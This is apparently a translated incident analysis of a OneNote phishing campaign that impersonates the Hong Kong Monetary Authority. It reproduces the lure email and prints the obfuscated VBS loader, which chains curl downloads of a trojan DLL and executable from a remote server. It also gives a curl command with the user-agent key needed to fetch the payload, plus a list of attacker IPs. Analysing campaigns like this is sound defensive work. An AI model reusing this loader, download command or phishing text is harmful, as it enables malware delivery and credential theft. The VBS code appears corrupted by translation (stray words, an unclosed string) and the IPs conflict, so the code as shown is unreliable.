Take one of the cases encountered as an example to expand the analysis:
1. Use phishing email copy + .one file attachment
From: Bank Complaints <[email protected]>
Sent: Thursday, March 2, 2023 11:00 AM
To: Miles Mok XXXX
Subject: [External Mail] xxxx Industry Development Survey
Dear XXXX Ltd employees,
The Hong Kong Monetary Authority would like to conduct an annual banking industry development survey to assess the performance and employment situation in the financial industry. This is COMPULSORY for all employees to submit the survey to fulfill the requirement of CG-6 (Supervisory Policy Manual). Your feedback is extremely important to us, it would be highly appreciated if you could submit the survey by 10th March (Fri).
To xxxx staff :
The Hong Kong Monetary Authority also conducts a banking industry development survey every year to understand the performance and employment situation of the financial industry. All bank staff are required to submit questionnaires as required by CG-6 (Supervisory Policy Manual). Your feedback is very important to us and we would appreciate it if you could submit the questionnaire by Friday , March 10th .
Yours sincerely,
Financial Infrastructure Development Department Hong
Kong Monetary Authority55th Floor |2 IFC 8 Finance Street | Central Hong Kong
2. Analysis of phishing attack infrastructure
E-mail: [email protected]
VBS script content:
<job id="AlterClassic">
<script language="VBScript">
Dim r
Dim what
Dim apq
Dim ape
apq = "gM6VYXKWe"
r= "p"
Dim az
az = "5.107/1Moc"
r = r & "owE"
r = r & "r"
Dim in
en = "ll htt"
Sun and
et = " -o %temp"
ape = "vfy9XpqF"
r = r & "sH"
r = r & "el"
Dim d
d = "-"
Dim q
q = "w"
q = "i" & q
Dim u
u = ":"
apa = "5hwqtJeqJ"
apv = "tgogNk"
Dim ap
ap = apa & apq & ape & apv
Dim ad
ad = "cUr"
Dim aw
aw = "L -k -A "
Dim be
fi = "%\di"
Dim gk
gk = "smco"
dim house
ev = "re.d"
Dim qw
qw = "231.6"
Dim dll
dll = "Dis"
Dim nm
nm = "a7/160223"
Dim of
de = "ll"
Dim sx
sx = "%\Dis"
Dim sc
sc = "m.e"
Dim sv
sv = "xe htt"
Dim sw
sw = " %tem"
Dim sp
sp = "p%\Di"
Dim zz
zz = "ps://20."
Dim bbc
bbc = gk & ev & en & zz & qw & az & nm & " &&
Dim sb
sb = "sm.e"
Dim sn
sn = "xe"
Dim dl
dl = "dEl"
Dim car
car = "car"
Dim ed
ed = "di"
Dim sq
sq = "a7/160224 &&"
Dim xp
xp = ad&aw&ap&et&fi&bbc&ad&aw&ap&et&sx&sc&sv&zz&qw&az&sq&sw&sp&sb&sn
CreateObject("WScript.Shell").Run "cmd.exe /c" & xp ,0, True
Dim nd
nd = dl&sw&"p%\"&dll&sc&xe&"&&"&dl&sw&"p%\"&ed&gk&ev&de
wscript.sleep 100000
CreateObject("WScript.Shell").Run "cmd.exe /c" & nd ,0, True
</script>
</job>
Audit its code, and finally splicing it to use vbs script to download the remote Trojan horse. The Trojan horse address is:
20.231.65.107/1Moca7/160223
Note: This Trojan cannot be downloaded directly, it is protected by user-agent, you need to use the -A user-agent parameter to download.
curl -A 5hwqtJeqJgM6VYXKWevfy9XpqFtgogNk -o dsmcore.dll https://20.231.65.181/1Moca7/160223
Use the Weibu online intelligence system to conduct an associated query on its IP
It was found that the IP was a machine in Virginia Beach, Virginia, USA , and it had been marked as a phishing IP . It had been used as a phishing machine to deliver phishing Trojans as early as 2022.3.22 .
In addition, a correlation study was conducted on the C segment of its IP, and it was found that there were more than 20 machines in the C segment, all of which were used for phishing. It must be a phishing infrastructure deployed by a company's attack and defense team.
We fish out all its IPs, as follows:
20.231.65.88
20.231.65.131
20.231.65.136
20.231.65.3
20.231.65.47
20.231.65.80
20.231.65.86
20.231.65.101
20.231.65.106
20.231.65.147
20.231.65.164
20.231.65.181
20.231.65.187
20.231.65.207
20.231.65.247
20.231.65.254
20.231.65.10
20.231.65.109
20.231.65.51
20.231.65.125
3. Research on phishing attack methods
Through research, we discovered the real attack method and attack principle used by this phishing gang.
Reference address (discovered on 2023.1.27)
https://twitter.com/AttackTrends/status/1623670800266952705?s=20
Hackers used OneNote attachments in phishing emails to install malware and gain access passwords.
Malicious actors take advantage of Microsoft 's frequent feature updates to OneNote , double-click spam emails, and automatically run scripts that install malware from remote sites onto users' computers.
OneNote is one of the very popular components of the Microsoft 365 package, and now the company is updating it. However, the product's frequent beta testing has resulted in vulnerabilities that hackers can exploit for phishing-based malware attacks. Now, security professionals have put in place warnings that malicious actors are using OneNote attachments to covertly install malware onto user devices.
The warning was originally sent via a tweet from Perception Point Attack Trends , which reported the vulnerability. Not only can the malware be used to steal passwords, but it can also be used to attack cryptocurrency wallets and even install other add-ons on unsuspecting users' devices.
Attack principle:
Hackers have found ways to bypass macro blocking to deliver malware. Hackers design phishing emails specifically to include things like fake invoices, payments, or notifications.
In most cases, the image of the email will be blurred with the text " Double-click to view the file " .
Double-clicking actually runs a malicious Visual Basic script file that begins communicating with a remote server to install malware , including various Trojan horse programs.
However, to fully protect themselves, OneNote users must heed the application's warnings and use multi-factor authentication, antivirus, and firewalls whenever possible. Also, don't download attachments from unfamiliar email links.
Screenshot of this phishing attack process:
1) The attacker sends emails in batches
2) The victim downloads the .one attachment and opens it normally (screenshot of the actual effect)
NOTE : To confuse users, this image contains malicious code that downloads normal .one files from legitimate websites and opens normal .one files with normal OneNote. The latter code downloads the bat file from another hacker website, and executes the bat file to perform malicious operations. The opening of OneNote in the front is only used as a shield, not because the .one file format has a loophole.
3) The victim double-clicks the Double click to view document (covers the hidden script), and actually executes the vbs script
The script content is as follows:
4) The victim clicks the vbs script to automatically pull the remote control Trojan that the attacker has deployed
Use curl to pull the dll and exe trojans that attack the server 20.231.65.107 and execute them
5) The attacker's C2 server obtains the victim's PC machine permissions for further intranet penetration (information collection)